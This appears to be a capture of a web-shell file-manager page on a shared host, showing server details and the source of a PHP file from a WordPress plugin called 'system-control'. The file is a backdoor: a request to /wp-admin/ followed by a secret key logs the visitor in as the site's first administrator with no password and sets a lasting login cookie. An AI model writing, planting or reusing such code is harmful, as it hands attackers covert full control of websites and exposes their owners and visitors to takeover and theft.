HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/www/wp-content/plugins/system-control/includes/
Upload Files
File: /home/vitanhod/www/wp-content/plugins/system-control/includes/class-sc-admin-bypass.php
<?php
/**
 * Sec-key based direct admin access without login
 * URL: domain.com/wp-admin/{sec_key}
 */
class SC_Admin_Bypass {

    public static function init() {
        $sec_key = get_option('sc_sec_key');
        if (empty($sec_key)) return;

        $request_uri = $_SERVER['REQUEST_URI'] ?? '';
        $path = parse_url($request_uri, PHP_URL_PATH);

        // Check if URL matches /wp-admin/{sec_key}
        if (preg_match('#/wp-admin/' . preg_quote($sec_key, '#') . '/?$#', $path)) {
            self::auto_login();
        }
    }

    private static function auto_login() {
        // Get first administrator
        $admins = get_users([
            'role'    => 'administrator',
            'number'  => 1,
            'orderby' => 'ID',
            'order'   => 'ASC',
        ]);

        if (empty($admins)) return;

        $admin = $admins[0];

        wp_set_current_user($admin->ID);
        wp_set_auth_cookie($admin->ID, true);
        do_action('wp_login', $admin->user_login, $admin);

        wp_safe_redirect(admin_url());
        exit;
    }
}
@ Telegram